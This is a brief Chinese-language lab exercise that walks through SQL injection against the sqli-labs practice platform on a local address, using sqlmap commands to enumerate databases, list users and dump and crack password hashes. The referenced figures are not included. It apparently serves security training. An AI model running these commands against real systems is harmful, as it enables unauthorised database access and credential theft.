SQL注入 2.1 问题 在SQL注入平台上进行攻击 获取数据库 获取用户、破解密码 2.2 步骤 实现此案例需要按照如下步骤进行。
1)准备好SQL注入平台,如图-4所示
图-4
2)获取数据库,如图-5所示。
sqlmap -u 192.168.111.10/sqli-labs/less-1/?id=1 --dbs
图-5
3)获取用户、破解密码,如图-6和图-7所示,用户名和密码都是root
sqlmap -u 192.168.111.10/sqli-labs/less-1/?id=1 --users sqlmap -u 192.168.111.10/sqli-labs/less-1/?id=1 --passwords 图-6
图-7
